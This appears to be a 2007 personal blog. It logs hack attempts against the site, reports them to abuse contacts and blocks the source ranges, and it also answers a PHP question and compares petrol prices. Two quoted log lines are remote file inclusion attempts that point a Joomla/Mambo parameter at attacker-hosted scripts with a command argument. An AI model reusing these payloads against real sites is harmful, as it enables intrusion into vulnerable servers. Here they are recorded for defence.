After the mention in Script Kiddies 2 and being given a report that one of their account holders has put up a site defacing script, the free hosting site phpnet.us cancelled the damaging account.
It is a real pity that so many of their competitors do not act equally responsibly.

The logs showed up another attempted exploit, very similar to the one in New Hack Attempt

88.242.239.182 - - [27/May/2007:18:40:29 +0100] “GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://xyu.phpnet.us/xyu.dat?&list=1&cmd=id HTTP/1.0″ 403 327 “-” “Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)”


phpnet.us which provides the hosting does not give a direct way for unregistered users to contact them regarding abuse, but I have used the registered email address at hostorgadmin@googlemail.com to let phpnet.us know that there service is being used by script kiddies.

The originating IP address belongs to the the familiar TurkTelekom, who seem to have become the home of some script kiddies.

inetnum: 88.242.64.0 - 88.242.255.255
netname: TurkTelekom
descr: TT ADSL-alcatel dynamic_aci

As usual, their abuse account bounced a the complaint.
It looks like another of their IP ranges will have to be blocked.

In the feed back form for dragonthoughts.com, I found the following comments today:

Hi, i have a problem in the mkdir() function in php. the following code
works in wamp server, but when i tried uploading it to a fedora core
server, it couldnt create the directory anymore.

$query0 = "SELECT * FROM request";
$result0 = mysql_query($query0) or die("Query 0 failed ");
while ($line = mysql_fetch_array($result0)) {
if ($line['finish_status']==’ok’) {
$content++;
//break;
}
}

$dir = $_SERVER['DOCUMENT_ROOT'].’/quotations/’.$content;
$check = mkdir($dir,0777,TRUE);


The only problem being, that the requester, didn’t give a return email address! They did find this site through a link from Webmaster world.

My personal guess is that they are running PHP in safe mode on their fedora core, and I would have happily emailed them to assist, if they had given me a chance!

After a week, genchackers is still being hosted and still serving scripts that can break security on badly configured sites.

The following hack attempt appeared in the dragonthoughts logs yesterday.

88.233.150.109 - - [21/May/2007:21:39:02 +0100] “GET /index.php?mosConfig_absolute_path=http://genchackers.net/tool20.dat?&list=1&cmd=id HTTP/1.0″ 403 283 “-” “Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)”

presumably it is a script kiddy, who has no idea how old the exploit is, but these reports of a year ago will provide an idea:

• http://osvdb.org/displayvuln.php?osvdb_id=27010
• http://xforce.iss.net/xforce/xfdb/27906

The listed abuse reporting email address bounced my complaint, for the originators IP range 88.233.0.0 - 88.233.255.255

netname: TurkTelekom
descr: TT ADSL-alcatel_gay

So, all of its IP ranges will have their access blocked.

As will the range 212.175.205.0- 212.175.205.255 which is hosting genchackers.net

The hacker script that is hosted at genchackers.net was ripped off from http://georgiaeliteallstars.com although they seem to have taken the script down now.

As it stands, the script can’t work for the kiddie that downloaded it, but I don’t think it is appropriate or ethical to explain how to fix it!

In today’s Asahi Shimbun, there is a article bemoaning the rise in petrol prices in Japan. It explains that due to the weak Yen and rising crude oil prices, “regular gasoline now costs 137 yen per liter“. At current exchange rates, this is equivalent to approximately 57p per litre in Britain.

Currently, in Britain, petrol costs around 92p per litre, more than 1.5 times that in Japan. It seems that despite significant rises in petrol costs, the Japanese still get it much cheaper.

As was noted in the article, there is the weak Yen to be considered. So this doesn’t take into account how much this is in real terms to a normal consumer. To take this into account, we should adjust the figures for the average national wage:

Country	Average Wage in 2006 £	Source
Japan	17,000	Japan Times Feb 2007
UK	23,244	National Statistics online

Using these figures as a basis, we can see that with a year’s wages, an average Japanese wage earner could still buy approximately 29,824 litres of fuel while a British person could buy only 25,265 litres of petrol for the same year’s work.

This shows that, despite a weak Yen and a rise crude oil prices, in terms of average wages, petrol in Britain is still 18% more expensive than in Japan.